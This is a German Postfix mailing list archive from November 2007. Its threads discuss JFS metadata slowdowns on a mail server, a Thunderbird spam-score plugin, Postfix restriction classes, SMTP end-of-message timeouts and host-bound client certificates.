bgc-jena.mpg.de Fri Nov 2 10:49:26 2007 From: pkoch at bgc-jena.mpg.de (Dr.Peer-Joachim Koch) Date: Fri, 02 Nov 2007 10:49:26 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472ADF62.6030705@linuxrocks.dyndns.org> References: <472ADD58.7070009@bgc-jena.mpg.de> <472ADF62.6030705@linuxrocks.dyndns.org> Message-ID: <472AF2A6.3040209@bgc-jena.mpg.de> Hallo, Matthias Haegele schrieb: > > Wohin geht das Backup? TSM als Backup Software. > >> Als Kurzzusammenfassung: ein einfaches >> "find . -type f -exec cat {} > /dev/null \; " >> dauert auf dem Mailserver ~110 sek. >> Auf einem neu angelegten Dateisystem für die doppelte Anzahl >> 23sek. (auf einem langsameren Raid !). > > Rein interessehalber: Darf man Fragen welche Tests mit welchem Ergebnis > durchgeführt wurden? > Welche Hardware ist das? "Hardware-Raid" oder Software-Raid?. > > > Nur so zur Sicherheit: > Das Filesystem ist nicht über 90% "voll"? Kurze Zusammenfassung: Hardware: Mailserver läuft auf einem Dell Poweredge 2450 2 * Xeon 2.8GHz 2 GB Ram 1 FC HBA QLA2200 -> 1 LUN ~ 500GB Raid5 auf EMC CX700 (4+1 FC HD's ) 2 Server mit identischer HW als Failover (gleiche LUN's zugänglich). ------- Zum testen habe ich noch eine EMC FC4700 (vorgänger von der CX Serie) mit einer 300GB Partition. ------- Das TSB Backup benötigt für 2.7 Mil Files ~2.5h. Der FC-Port zeigt dabei einen Durchsatz < 1MB/sek. Das ist nicht mal mehr lahm zu nennen. Mit einem "dd" kommt man locker über 40MB/s Das FS ist zu ~60% belegt. ---------------------------------- Testvorgehen in Kurzform: 1 Ordner ausgewäehlt und mit find nach /dev/null "gesichert" auf dem aktivem Mailserver. Auf dem Backupmailserver ist auf der alten LUN (FC4700) - wurde vor 1.5y auf die CX migriert - dieser Ordner entpackt und getestet -> in etwa selbe Zeit. Filesystem neu angelegt und mit diesem Ordner getestet (d.h. diesen Ordner entpackt und dupiziert -> 127MB) getestet: ext2, ext3, jfs Alle ~ gleich schnell 25sek statt 110sek bei doppelter Datenmenge und langsameren Raid (FC4700). Weder das Testsystem (Backup Mailserver) noch der eigentliche Mailserver haben großen Auffälligkeiten (iostat, vmstat, sar). Wenn es interessiert kann ich die Daten per mail direkt senden, ist aber 'ne ganze Menge. --------------- Mir ist es auch nicht so bewusst geworden, bis ic hangefangen habe unser SAN permanent und vollständig zu monitoren. Wir haben eigentlich ein Problem mit unsrem GFS-(File services) Backup, das mittlerweile jeden Tag ~1TB umfasst. Aber der Fileserver braucht für 17Mil Files (check) 3.5h, während der Mailer für 2.5Mil 2h benötigt. Natürlich ist die FS Hardware viel neuer, aber der Unterschied ist einfach viel zu groß. Daher habe ich angefangen genauer hinzusehen, na ja und jetzt gibt es halt eine Arbeitshypothese auf der jfs-Liste, die es zu überprüfen gilt ... -- Tschau, Peer _________________________________________________________ Max-Planck-Institut fuer Biogeochemie Dr. Peer-Joachim Koch Hans-Knöll Str.10 Telefon: ++49 3641 57-6705 D-07745 Jena Telefax: ++49 3641 57-7705 -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 7212 bytes Beschreibung: S/MIME Cryptographic Signature URL : From crandler at crandland.de Fri Nov 2 10:59:50 2007 From: crandler at crandland.de (crandler) Date: Fri, 2 Nov 2007 10:59:50 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472AF2A6.3040209@bgc-jena.mpg.de> Message-ID: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> > ---------------------------------- > Testvorgehen in Kurzform: > > [...] > --------------- > Mir ist es auch nicht so bewusst geworden, bis ic hangefangen habe > unser SAN permanent und vollständig zu monitoren. > Wir haben eigentlich ein Problem mit unsrem GFS-(File services) > Backup, das mittlerweile jeden Tag ~1TB umfasst. > Aber der Fileserver braucht für 17Mil Files (check) 3.5h, > während der Mailer für 2.5Mil 2h benötigt. > > Natürlich ist die FS Hardware viel neuer, aber der Unterschied > ist einfach viel zu groß. Daher habe ich angefangen genauer > hinzusehen, na ja und jetzt gibt es halt eine Arbeitshypothese > auf der jfs-Liste, die es zu überprüfen gilt ... Es geht immer noch nicht daraus hervor, ob die Tests auf dem „aktiven“ System unter Last oder im Leerlauf ausgeführt wurden. From email at heiwu.de Fri Nov 2 11:12:22 2007 From: email at heiwu.de (email at heiwu.de) Date: Fri, 2 Nov 2007 11:12:22 +0100 (CET) Subject: [Postfixbuch-users] Spam-Level in Thunderbird anzeigen In-Reply-To: <47286B08.8020802@mschuette.name> References: <47286B08.8020802@mschuette.name> Message-ID: <1532.80.66.16.202.1193998342.squirrel@heiwu.de> > email at heiwu.de schrieb: >> Meine Frage: Kennt jemand ein Thunderbird-Plugin, dass mir direkt in der >> Liste der im Konto liegenden Mails in einer zusätzlichen Spalte den von >> Spamassassin ermittelten Spam-Wert anzeigt? > > http://ryanlee.org/software/mozilla/thunderbird/spamness/ > > -- > Martin Hallo Liste! Erstmal vielen Dank für eure Hilfen und Vorschläge! Da über den Mailserver automatisch generierte Bestelleungen von Kunden laufen, die anschließend wiederum automatisch abgerufen und verarbeitet werden, muss sichergestellt sein, dass keine Bestellung versehentlich im Spam unterkommt (und da gelöscht wird). Ich will meinen Spam nicht sortieren, sondern nur "false-positives" schneller erkennen können. Daher hat Martin's Tipp (Spamness-Plugin) genau ins Schwarze getroffen. Das ist genau das, was ich suche! Knallrote, große Kreise könnte ich dann sofort löschen, ohne erst auf Absender und Betreff achten zu müssen. Ich habe mir also das Plugin Spamness installiert und sehe nun die Spalte, wo eigentlihc der Spam-Score angezeigt werden sollte. Leider habe ich dort bei allen Mails nur winzig kleine, graue Punkte. Selbst bei Mails, die einen Score von 7,3 und höher haben. Alles deutet darauf hin, dass das Plugin noch nciht korrekt arbeitet. Ich habe nirgends einen Hinweis gefunden, ob/wie man das Plugin konfigurieren kann (Extras/Add-Ons/Einstellungen ist deaktiviert), oder auf welche header-Einträge genau es hört. Momentan sehen die Spam-Einträge im Header so aus: X-Spam-Flag: YES X-Spam-Score: 7.391 X-Spam-Level: ******* X-Spam-Status: Yes, score=7.391 tag =-99.9 tag2=6.3 kill=6.3 tests= ... X-Spam-Report: * 2.6 RCVD_FAKE_HELO_DOTCOM ... Hat jemand das Plugin bei sich am Laufen und kann mir sagen, wie seine Header aussehen bzw. auf welche Einträge das Plugin reagiert?! Vielen Dank, Heiner From pkoch at bgc-jena.mpg.de Fri Nov 2 12:09:50 2007 From: pkoch at bgc-jena.mpg.de (Dr.Peer-Joachim Koch) Date: Fri, 02 Nov 2007 12:09:50 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> References: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> Message-ID: <472B057E.30909@bgc-jena.mpg.de> Die Messungen auf dem aktivem Mailserver erfolgten unter Last (< 0.1), d.h. im aktivem Betrieb. Auf dem Standby läuft ausser einem Ldapserver nichts. Allerdings zeigte der erste Versuch (mit dem alten Dateisystem auf dem Standby ein analoges Verhalten (und Werte!), so dass die Auslastung der Maschine nicht wesentlich das Ergebnis verfälscht. DAS es ein Einfluss hat ist klar, aber nicht um Faktoren in diesem Fall ... Tschau, Peer crandler schrieb: >> ---------------------------------- >> Testvorgehen in Kurzform: >> >> [...] >> --------------- >> Mir ist es auch nicht so bewusst geworden, bis ic hangefangen habe >> unser SAN permanent und vollständig zu monitoren. >> Wir haben eigentlich ein Problem mit unsrem GFS-(File services) >> Backup, das mittlerweile jeden Tag ~1TB umfasst. >> Aber der Fileserver braucht für 17Mil Files (check) 3.5h, >> während der Mailer für 2.5Mil 2h benötigt. >> >> Natürlich ist die FS Hardware viel neuer, aber der Unterschied >> ist einfach viel zu groß. Daher habe ich angefangen genauer >> hinzusehen, na ja und jetzt gibt es halt eine Arbeitshypothese >> auf der jfs-Liste, die es zu überprüfen gilt ... > > Es geht immer noch nicht daraus hervor, ob die Tests auf dem ?aktiven? > System unter Last oder im Leerlauf ausgeführt wurden. > -- Mit freundlichem Gruss Peer-Joachim Koch _________________________________________________________ Max-Planck-Institut fuer Biogeochemie Dr. Peer-Joachim Koch Hans-Knöll Str.10 Telefon: ++49 3641 57-6705 D-07745 Jena Telefax: ++49 3641 57-7705 -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 7212 bytes Beschreibung: S/MIME Cryptographic Signature URL : From hartmut.woehrle at mail.pcom.de Fri Nov 2 12:17:08 2007 From: hartmut.woehrle at mail.pcom.de (Hartmut =?utf-8?q?W=C3=B6hrle?=) Date: Fri, 2 Nov 2007 12:17:08 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472B057E.30909@bgc-jena.mpg.de> References: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> <472B057E.30909@bgc-jena.mpg.de> Message-ID: <200711021217.08197.hartmut.woehrle@mail.pcom.de> Hallo Peer, also die FC Durchsatz Werte sind so "lausig", dass es eigentlich nicht das Filesystem sein kann. Was für eine Anbindung hast Du: EMC PowerPath oder Linux native multipath? Ist die (Kabel) Anbindung loadbalancing oder failover? Was sagen die Tools für den SAN Switch? Gruss Hartmut Am Freitag, 2. November 2007 12:09 schrieb Dr.Peer-Joachim Koch: > Die Messungen auf dem aktivem Mailserver erfolgten > unter Last (< 0.1), d.h. im aktivem Betrieb. > > Auf dem Standby läuft ausser einem Ldapserver nichts. > > Allerdings zeigte der erste Versuch (mit dem alten Dateisystem auf dem > Standby ein analoges Verhalten (und Werte!), so dass > die Auslastung der Maschine nicht wesentlich das Ergebnis verfälscht. > > DAS es ein Einfluss hat ist klar, aber nicht um Faktoren in diesem > Fall ... > > Tschau, Peer > > crandler schrieb: -- =========================================== Hartmut Woehrle EMail: hartmut.woehrle at mail.pcom.de From pkoch at bgc-jena.mpg.de Fri Nov 2 12:39:22 2007 From: pkoch at bgc-jena.mpg.de (Dr.Peer-Joachim Koch) Date: Fri, 02 Nov 2007 12:39:22 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <200711021217.08197.hartmut.woehrle@mail.pcom.de> References: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> <472B057E.30909@bgc-jena.mpg.de> <200711021217.08197.hartmut.woehrle@mail.pcom.de> Message-ID: <472B0C6A.1090606@bgc-jena.mpg.de> Hallo Hartmut, Powerpath, failover. Da habe ich auch zuerst gedacht. Aber a) bei dd bekommt man vernüftige Durchsatzwerte b) warum dann der Performancesprung mit dem neuen FS ? Wie gesagt alles identisch sprung von 110sek -> 23sek. FC Durchsatz am Switchportist dann auch OK. Dann KANN es weder der FC-Part, noch das FS noch die Raid-LUN, das Kernel oder sonstwas sein. Nur die Metadatenstruktur. Bei JFS war mir ein solch drastischer Abfall auch noch nie aufgefallen. Bisher war es da weniger anfällig als ext3 oder xfs. Tschau, Peer Hartmut Wöhrle schrieb: > Hallo Peer, > > also die FC Durchsatz Werte sind so "lausig", dass es eigentlich nicht das > Filesystem sein kann. Was für eine Anbindung hast Du: EMC PowerPath oder > Linux native multipath? Ist die (Kabel) Anbindung loadbalancing oder > failover? > Was sagen die Tools für den SAN Switch? > > Gruss > Hartmut -- Mit freundlichem Gruss Peer-Joachim Koch _________________________________________________________ Max-Planck-Institut fuer Biogeochemie Dr. Peer-Joachim Koch Hans-Knöll Str.10 Telefon: ++49 3641 57-6705 D-07745 Jena Telefax: ++49 3641 57-7705 -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 7212 bytes Beschreibung: S/MIME Cryptographic Signature URL : From hartmut.woehrle at mail.pcom.de Fri Nov 2 12:56:56 2007 From: hartmut.woehrle at mail.pcom.de (Hartmut =?utf-8?q?W=C3=B6hrle?=) Date: Fri, 2 Nov 2007 12:56:56 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472B0C6A.1090606@bgc-jena.mpg.de> References: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> <200711021217.08197.hartmut.woehrle@mail.pcom.de> <472B0C6A.1090606@bgc-jena.mpg.de> Message-ID: <200711021256.56372.hartmut.woehrle@mail.pcom.de> Hmmmm.... schon mal bonnie++ oder einen anderen Filesystem Benchmark laufen lassen? Der macht ja Sachen auf unterster (Filesystem-)Ebene, sollte also einen puren Filesystemdurchsatz zeigen. Gruss Hartmut Am Freitag, 2. November 2007 12:39 schrieb Dr.Peer-Joachim Koch: > Hallo Hartmut, > > Powerpath, failover. > > Da habe ich auch zuerst gedacht. Aber > a) bei dd bekommt man vernüftige Durchsatzwerte > b) warum dann der Performancesprung mit dem neuen FS ? > > Wie gesagt alles identisch sprung von 110sek -> 23sek. > FC Durchsatz am Switchportist dann auch OK. > > Dann KANN es weder der FC-Part, noch das FS noch die Raid-LUN, > das Kernel oder sonstwas sein. Nur die Metadatenstruktur. > > Bei JFS war mir ein solch drastischer Abfall auch noch nie aufgefallen. > Bisher war es da weniger anfällig als ext3 oder xfs. > > Tschau, Peer > > Hartmut Wöhrle schrieb: > > Hallo Peer, > > > > also die FC Durchsatz Werte sind so "lausig", dass es eigentlich nicht > > das Filesystem sein kann. Was für eine Anbindung hast Du: EMC PowerPath > > oder Linux native multipath? Ist die (Kabel) Anbindung loadbalancing oder > > failover? > > Was sagen die Tools für den SAN Switch? > > > > Gruss > > Hartmut -- =========================================== Hartmut Woehrle EMail: hartmut.woehrle at mail.pcom.de From jonny.oschaetzky at wittcom.de Fri Nov 2 13:11:31 2007 From: jonny.oschaetzky at wittcom.de (=?ISO-8859-1?Q?Jonny_Osch=E4tzky?=) Date: Fri, 02 Nov 2007 13:11:31 +0100 Subject: [Postfixbuch-users] Spam-Level in Thunderbird anzeigen In-Reply-To: <1532.80.66.16.202.1193998342.squirrel@heiwu.de> References: <47286B08.8020802@mschuette.name> <1532.80.66.16.202.1193998342.squirrel@heiwu.de> Message-ID: <472B13F3.6070006@wittcom.de> > Alles deutet darauf hin, dass das Plugin noch nciht korrekt arbeitet. Thunderbird kann (unter normalen Umständen) nur die Daten in der Übersicht anzeigen, die in der DB (*.msf) abgelegt werden. Ich denke dager, dass der Wert "mailnews.customDBHeaders" in "about:config" noch auf "x-spam-score" gesetzt werden muss, damit das Plugin funktionieren kann. Eventuell mal einen Blick in den Code werfen. Die Mozilla-Extensions sind im ZIP-Format gepackt. Ich habe vor einiger Zeit eine solche Extension zusammengeschu...^Wgeschrieben, aber noch nicht fertig gestellt. Im Moment werden die Daten zwar rudimentär angezeigt, können aber noch nicht korrekt sortiert ausgeben kann. Bei Bedarf schicke ich dir die experimentelle Extension per Mail. Gruß Jonny From pkoch at bgc-jena.mpg.de Fri Nov 2 14:06:42 2007 From: pkoch at bgc-jena.mpg.de (Dr.Peer-Joachim Koch) Date: Fri, 02 Nov 2007 14:06:42 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <200711021256.56372.hartmut.woehrle@mail.pcom.de> References: <007301c81d37$1c2d5980$2200a8c0@netclusive.local> <200711021217.08197.hartmut.woehrle@mail.pcom.de> <472B0C6A.1090606@bgc-jena.mpg.de> <200711021256.56372.hartmut.woehrle@mail.pcom.de> Message-ID: <472B20E2.6060504@bgc-jena.mpg.de> Hallo Hartmut, nein jetzt aktuell noch nicht. Dazu muss ich noch die alten Werte raussuchen, die ich beim aufsetzen des Systems gemessen habe. Ich nehme i.d.R. iozone Hallo Helmut, ich versuche daran zu denken mit einem zweiten Profil ohne digitale Signature zu arbeiten, wenn ich an die Liste schreibe... ;) Hartmut Wöhrle schrieb: > Hmmmm.... > > schon mal bonnie++ oder einen anderen Filesystem Benchmark laufen lassen? > Der macht ja Sachen auf unterster (Filesystem-)Ebene, sollte also einen puren > Filesystemdurchsatz zeigen. > > Gruss > Hartmut > > -- Mit freundlichem Gruss Peer-Joachim Koch _________________________________________________________ Max-Planck-Institut fuer Biogeochemie Dr. Peer-Joachim Koch Hans-Knöll Str.10 Telefon: ++49 3641 57-6705 D-07745 Jena Telefax: ++49 3641 57-7705 From lists at mschuette.name Fri Nov 2 16:31:12 2007 From: lists at mschuette.name (=?ISO-8859-1?Q?Martin_Sch=FCtte?=) Date: Fri, 02 Nov 2007 16:31:12 +0100 Subject: [Postfixbuch-users] Spam-Level in Thunderbird anzeigen In-Reply-To: <472B13F3.6070006@wittcom.de> References: <47286B08.8020802@mschuette.name> <1532.80.66.16.202.1193998342.squirrel@heiwu.de> <472B13F3.6070006@wittcom.de> Message-ID: <472B42C0.1030908@mschuette.name> Jonny Oschätzky schrieb: > Thunderbird kann (unter normalen Umständen) nur die Daten in der > Übersicht anzeigen, die in der DB (*.msf) abgelegt werden. Ich denke > dager, dass der Wert "mailnews.customDBHeaders" in "about:config" noch > auf "x-spam-score" gesetzt werden muss, damit das Plugin funktionieren Genau. Den Wert ist bei mir auch eingetragen (weiß aber nicht mehr ob selbst eingefügt oder vom Plugin automatisch angelegt). Bei alten Mails (die schon in der DB vorhanden sind) fehlt die Info, daher der graue Kreis. Um das zu aktualisieren kann mit Thunderbird über die Ordner-Eigenschaften der Index wiederhergestellt werden. -- Damit wird die DB (mit Spam-Score) neu aufgebaut und die Hinweise sollten erscheinen. -- Martin From heribert.bellenberg at uni-due.de Fri Nov 2 17:51:12 2007 From: heribert.bellenberg at uni-due.de (Bellenberg) Date: Fri, 02 Nov 2007 17:51:12 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Einschr=E4nkung_der_E-Mail-Be?= =?iso-8859-15?q?rechtigung?= Message-ID: <472B5580.9070306@uni-due.de> Hallo *, kennt jemand aus der Runde einen Trick wie einzelne User vom smtp-Versand und Empfang ausgeschlossen werden könnten? Also nur an mydomain-Adressen E-Mails versenden und von ebensolchen auch empfangen sollen, während alle "externen" Adressen für diese User nicht erreichbar sind. Für jede Info dankbar! Gruss, h.bellenberg From p.heinlein at heinlein-support.de Sat Nov 3 09:38:51 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Sat, 3 Nov 2007 09:38:51 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Einschr=E4nkung_der_E-Mail-Ber?= =?iso-8859-1?q?echtigung?= In-Reply-To: <472B5580.9070306@uni-due.de> References: <472B5580.9070306@uni-due.de> Message-ID: <200711030938.51548.p.heinlein@heinlein-support.de> Am Freitag, 2. November 2007 schrieb Bellenberg: > kennt jemand aus der Runde einen Trick wie einzelne User vom > smtp-Versand und Empfang ausgeschlossen werden könnten? > Also nur an mydomain-Adressen E-Mails versenden und von ebensolchen > auch empfangen sollen, > während alle "externen" Adressen für diese User nicht erreichbar sind. Restriction-Classe aufsetzen und in der Restriction dierser User dann auf permit_sasl_authenticated und permit_mynetworks verzichten. Sie können dann nur ganz normal einliefern -- so, als ob sie von außen kommen. Also ganz normal an Mailadressen auf diesem Host. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From spameimer at stefan-foerster.de Sat Nov 3 11:45:44 2007 From: spameimer at stefan-foerster.de (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Sat, 3 Nov 2007 11:45:44 +0100 Subject: [Postfixbuch-users] Filesystem Performance In-Reply-To: <472ADD58.7070009@bgc-jena.mpg.de> References: <472ADD58.7070009@bgc-jena.mpg.de> Message-ID: <20071103104544.GA16416@mail.incertum.net> * "Dr.Peer-Joachim Koch" wrote: > "find . -type f -exec cat {} > /dev/null \; " > dauert auf dem Mailserver ~110 sek. > Auf einem neu angelegten Dateisystem für die doppelte Anzahl > 23sek. (auf einem langsameren Raid !). > > Gut, der Mailserver läuft jetzt 4 Jahre und kein Filesystem wird > "schneller" im laufe der Zeit. > Es ist sicherlich auch ein Problem des cyrus (jede Mail == eine Datei). > > Trotzdem würde mich interessieren, ob jemand einen Weg gefunden hat > im laufenden Betrieb dieses Problem anzugehen. Wir sind Mitte 2006 in ein Problem gelaufen, von dem ich denke, daß es genau das selbe ist wie bei Euch - zumindest klingen die Symptome identisch: Bei uns war damals ein Volume betroffen, auf dem eine große Zahl temporärer Dateien erstellt und wieder gelöscht wurden. Nach drei (zwei?) Jahren hat auf dem entsprechenden Volume selbst der Befehl "ls" oder ein einfaches "stat" auf eine Datei spürbar länger gedauert als auf einem frisch angelegten Filesystem. Wenn Du das selbe Problem hast, dann sollte nicht nur Dein obiger Befehl (der übrigens nicht so der Bringer zum Messen ist, lieber, bei vorhandenem GNU-Userland sowas wie find . -type f -print0 | xargs -0 cat... verwenden, Parallelität und so...) langsamer sein, sondern vor allem auch Dinge wie ein "ls -lR" oder nur der find - sprich, der Zugriff auf die Nutzdaten einer gegebenen Datei sollte schnell gehen (scheint bei Dir der Fall zu sein, mit "dd" hast Du ja getestet), der Zugriff auf die Metadaten jedoch langsam. Ein Kollege hat sich damals der Sache angenommen und nach einem längeren Mailaustausch mit irgendwem von IBM in Böblingen, den er kannte, hat er dann dafür gesorgt, daß Verzeichnisse, die keinerlei Nutzdaten mehr enthielten, komplett geleert werden. Also sprich, auf Dein Szenario bezogen und ohne Deinen IMAP-Server zu kennen, wenn in einem Mailordner nur noch die Übersichtsdaten oder der Cache des IMAP-Servers liegen (aber eben keine Mails mehr), dann auch diese Dateien komplett löschen. Das ganze hat das Problem damals bei uns stark abgemildert, jedoch nicht gänzlich behoben, und ich weiß auch nicht, in wie weit diese Lösung für Dich anwendbar ist, der "Fix" war damals recht spezifisch für unsere Datenstruktur. Was bei mir hängen geblieben ist, war, daß JFS wohl auf einer per-directory-Basis Probleme mit den (btree(?)-)Indizes hat, und der einzige Weg, das Neuerstellen dieser Indizes zu triggern, das komplette Leeren eines Verzechnisses ist. Leider kann man den besagten Kollegen nicht mehr befragen, da er kurz danach einem Herzinfarkt erlegen ist. Wenn Du willst, kann ich aber am Montag mal seine Mailfolder zurücksichern und dort nach "JFS" suchen - ich bin sicher, er hätte nichts dagegen. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #205: BSD - Berkeley Spongiform Derivative (Felix Deutsch) From ml at awinkelmann.de Sat Nov 3 15:27:50 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Sat, 3 Nov 2007 15:27:50 +0100 Subject: [Postfixbuch-users] Probs mit "timeout after END-OF-MESSAGE" In-Reply-To: <1821.87.79.46.49.1193946289.squirrel@www.webpeer.de> References: <6570.87.79.44.70.1193925597.squirrel@www.webpeer.de> <200711012005.45720.ml@awinkelmann.de> <1821.87.79.46.49.1193946289.squirrel@www.webpeer.de> Message-ID: <200711031527.50648.ml@awinkelmann.de> On Donnerstag, 1. November 2007, ram at i-tux.de wrote: > > On Donnerstag, 1. November 2007, ram at i-tux.de wrote: > >> >> ... aber viel häufiger kommt es zu folgendem: > >> >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: timeout after > >> END-OF-MESSAGE > >> >> from mxout2.volkswagen.de[194.114.62.48] > >> >> Nov 1 13:56:14 mx01 postfix/smtpd[14228]: disconnect from > >> >> mxout2.volkswagen.de[194.114.62.48] > >> >> [...] ca. 5 mal hintereinander die gleichen 2 obrigen Zeilen, nur > >> > >> andere > >> > >> >> PIDs jeweils > >> > > >> > Versuche doch mal, deine MTU runter zu drehen. z.B. ifconfig eth0 > >> > >> >> +: mtu> 1456 > >> > >> bringt leider nichts: > > > > Ja, weil smtpd != smtp ist. Du bist der Empfänger. > > > > Bei SMTP schickt der Sender die grossen Pakete, der Empfänger gibt nur > > kurze Quittungen zurück. Daher ist es relativ unsinnig die MTU-Grösse > > beim Empfänger herunterzudrehen. > > Sehe ich ein. > > > MTU-Probleme gibt es, wenn eine Station auf dem Weg zwischen Sender und > > Was steht denn zwischen dem Client und dem Internet? Ist da noch ein > > Router im Spiel? > > sagtest nicht gerade ich sei Empfänger? ;) Ich habe ehrlich keine Ahnung, > was die VW AG Wolfsburg da alles zwischen seinen MXern und dem Internet > haben könnte. Aber es wird nicht nur ein D-Link Router sein... Zwischen > Client und Server stehen zumindest sichtbar 10 weitere Hops, ganz normales > Routing im Inet halt. Meine Frage bezog sich darauf was zwischen Deinem Server (Postfix) und dem Internet steht. Wenn es ein Root-Server bei nem Provider ist, wird da wohl kein eigener Router mehr im Spiel sein. > > Kann vielleicht einfach nur der Sender ein Problem haben? > > Aus meiner Sicht ist es so. Nur bringt mir dieses Wissen nichts ohne > Lösung. Wir sind als Dienstleister für VW tätig und müssen/sollten sogar > etwaige Schwächen unseres Auftragsgebers meistern können. Und der Sender > ist der Prio 10 MX eines DAX-Konzerns. Ist für mich immer sehr riskant da > jemand ans Bein zu pinckeln ohne wirklich zu wissen, was los ist ;) > > > Am eindeutigsten bekommst Du den schuldigen heraus indem Du die Pakete > > mitschneidest (z.B. tcpdump). Am besten sogar möglichst nah am Internet. > > Was würde mir der Dump verraten? Das der Client die Connection nicht > abbaut? Hättest den Tip, auf was ich achten könnte? Mein smtpd hat eine > öffentliche IP an eth0 (keine DMZ etc) - steht bei Hetzner. Von der Fehlermeldung her hat der Client (Sender) die komplette Mail bei Dir abgeliefert hat aber das "250 2.0.0 OK ..." nicht bestätigt. Dies kann daran liegen, dass Dein Server es nicht gesendet hat oder dass TCP-Paket, welches das bestätigt verschütt gegangen ist. Mit nem Sniffer sähe man das recht schnell. Alternativ dazu das Verbose-Logging für den Server einschalten und ins Log schauen. Möglich wäre auch, dass Dein Server so lange braucht um das "250 2.0.0 OK ... " zu senden. Was auf zuviele bzw. zu langsame Überprüfungen der Mail schliessen liesse. Evtl. zu viele header/body_checks oder ein lahmer proxy-content_filter... -- Andreas From marco at marcomartinez.de Sat Nov 3 20:16:37 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Sat, 03 Nov 2007 20:16:37 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate Message-ID: <472CC915.3020708@marcomartinez.de> Hi @ all, Ich habe postfix mit Clientzertifikaten eingerichtet. Nun habe, vielleicht ein Grundlegendes Problem. Ich bin der Meinung wenn ich einer Person ein Clientzertifikat aushändige ist dieses Zertifikat nicht Rechner gebunden, Oder ? Das Problem ist. Ich habe auf meinem Lapi das Clientzertifikat installiert, wenn ich nun das Zertifikat auch auf meiner Desktopmaschine installieren will bekomme ich beim versenden von Mails die Meldung (Thunderbird), dass das Zertifikate ungültig ist weil ein gleiches mit der selben Seriennummer vorhanden ist. Was ja so richtig ist -> Laptop. Nun bin ich aber der Meinung das es Blödsinn wäre für jeden Rechner, die gleice Person, ein Clientzertifikat auszustellen, Oder? THX @ all und einen schönen Abend. Marco -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From fstoyan at swapon.de Sat Nov 3 21:04:49 2007 From: fstoyan at swapon.de (Friedemann Stoyan) Date: Sat, 03 Nov 2007 21:04:49 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472CC915.3020708@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> Message-ID: <472CD461.3090803@lab.swapon.de> Marco Estrada Martinez wrote: > Hi @ all, > > Ich habe postfix mit Clientzertifikaten > eingerichtet. Nun habe, vielleicht ein Grundlegendes Problem. > > Ich bin der Meinung wenn ich einer Person ein Clientzertifikat > aushändige ist dieses Zertifikat nicht Rechner gebunden, Oder ? Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. mfg Friedemann From marco at marcomartinez.de Sun Nov 4 17:25:00 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Sun, 04 Nov 2007 17:25:00 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472CD461.3090803@lab.swapon.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> Message-ID: <472DF25C.1090800@marcomartinez.de> Friedemann Stoyan schrieb: > Marco Estrada Martinez wrote: > > >> Hi @ all, >> >> Ich bin der Meinung wenn ich einer Person ein Clientzertifikat >> aushändige ist dieses Zertifikat nicht Rechner gebunden, Oder ? >> > > Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. > Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder > MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. > > > mfg Friedemann > Hi, mh dass ist natürlich schade. das würde ja bedeuten das ein und die selbe Person zwei Clientzertifikate benötigt (Wenn er zwei PC nutzt). Ich bin aber der Meinung das mit dem ausstellen des Clientzertifikates "Ich" als CA "unterschreibe" das es sich um die Person handelt. Oder? Liebe Grüße Marco -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature 